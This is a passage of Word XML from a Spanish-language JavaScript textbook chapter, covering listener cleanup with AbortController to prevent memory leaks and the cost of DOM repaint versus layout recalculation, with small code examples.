    <w:p w14:paraId="5735701E" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>canal.addEventListener("pedido", alRecibirPedido, { signal });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381B2164" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>window.addEventListener("resize", alRedimensionar, { signal });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DCC1CA" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="0000351B">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4703084C" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>// Al desmontar, una sola línea da de baja las tres:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A622200" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>controlador.abort();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BF4467" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">El mismo controlador sirve además para </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>cancelar peticiones de red en curso</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>, que es el uso del Capítulo 5: un componente que se desmonta mientras espera una respuesta la cancela con el mismo mecanismo.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29BED8A1" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
            <w:shd w:val="clear" w:color="DEEBF7" w:fill="DEEBF7"/>
          </w:tcPr>
          <w:p w14:paraId="21AFD433" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="2E74B5"/>
                <w:sz w:val="20"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>PARA ENTENDER: la cadena completa</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="716C6585" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Es la sección más importante del capítulo para el TPI. Fijate en la cadena entera:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="667F8A9D" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Clausura</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Capítulo 3) → un manejador recuerda su entorno → </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>mantiene vivo el nodo</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> aunque lo saques de la pantalla → </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>fuga de memoria</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> → </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>RN-F01</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45F58712" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Por eso la regla dice </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>disconnectedCallback()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>obligatorio</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>. No es formalidad: sin eso, tu aplicación funciona perfecto en la demo de quince minutos y se muere a las cuatro horas de uso real.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="774B95CD" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Y adivinás qué: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>un agente de IA no te va a escribir la baja.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> Te va a escribir el </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>addEventListener</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">, que es lo que hace falta para que funcione. La baja hace falta para que </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>siga</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> funcionando, y eso no se ve en la demo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="19895568" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulodelcaptulo"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc239320010"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4.10 — Lo que cuesta modificar el DOM</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w14:paraId="449E441B" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Modificar el árbol puede obligar al navegador a rehacer parte del trabajo de 1.7. Dos niveles:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tablaconcuadrcula"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2255"/>
        <w:gridCol w:w="2254"/>
        <w:gridCol w:w="2254"/>
        <w:gridCol w:w="2253"/>
      </w:tblGrid>
      <w:tr w:rsidR="0000351B" w14:paraId="177DB6D5" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>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06A7AB09" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Nivel</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695928F9" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Qué cambió</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1C85B4D9" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Qué rehace el navegador</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50779AE2" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Costo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="3D023907"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4CDBBDFA" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Repintado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2256" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="25140D4B" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Algo visual sin efecto sobre la geometría: un color, una sombra</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2256" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0D4EB830" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Vuelve a dibujar, sin recalcular posiciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2256" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1FFCB6EC" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Bajo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="4C158EBD"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19528B5A" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Recálculo de disposición</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2256" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0EB8ABF4" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Algo geométrico: un ancho, un margen, agregar un elemento</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2256" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5DA96237" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Recalcula posición y tamaño</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> de lo afectado, y después repinta</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2256" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4629C91F" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Mucho más caro</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7211D8C0" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Es la góndola del supermercado.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cambiarle el precio a un producto es repintar: el estante queda igual. Meter una caja más grande es recalcular la disposición: hay que correr todo lo demás, y a lo mejor la góndola entera. Los navegadores </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>agrupan esos recálculos</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> y los procesan juntos antes del siguiente cuadro, pero </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>ese agrupamiento se puede romper sin querer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B533C3" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc239320011"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Cómo se rompe el agrupamiento</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w14:paraId="0F8F9CFB" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Cuando tu código </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>lee</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> una propiedad que depende de la geometría —</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>offsetHeight</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>getBoundingClientRect()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>scrollTop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, el </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>innerText</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> de 4.6.2— el navegador está obligado a darte un valor correcto, y recalcula </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>ya mismo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> todo lo pendiente. Alternar escrituras y lecturas en un bucle fuerza un recálculo por vuelta:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1385F432" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>// Mal: cada vuelta escribe y después lee, forzando un recálculo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F5DFAF" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>for (const tarjeta of tarjetas) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3792F4EC" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">  tarjeta.style.width = "300px";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCACBFE" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">  console.log(tarjeta.offsetHeight);   // fuerza el recálculo acá mismo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0082F9" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AD710A" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="0000351B">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CD6334D" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>// Bien: primero todas las escrituras, después todas las lecturas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107AB9F6" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>for (const tarjeta of tarjetas) tarjeta.style.width = "300px";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3CD38E" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>const alturas = tarjetas.map(t =&gt; t.offsetHeight);   // un solo recálculo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8CC979" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Con cien elementos la diferencia es </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>de dos órdenes de magnitud</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>, y el síntoma es el bloqueo del hilo del Capítulo 3. Las tres estrategias que resuelven casi todo:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tablaconcuadrcula"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3007"/>
        <w:gridCol w:w="3005"/>
        <w:gridCol w:w="3004"/>
      </w:tblGrid>
      <w:tr w:rsidR="0000351B" w14:paraId="6BD391DA"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31A0D76" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Estrategia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9832DEC" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Qué evita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885B091" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Sección</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="10AA5A2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E8F369B" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Agrupar las inserciones</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> con </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>DocumentFragment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="472EAD0D" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Un recálculo por nodo insertado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="64B1B645" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>4.6.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="345F235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251188D" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Separar lecturas de escrituras</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
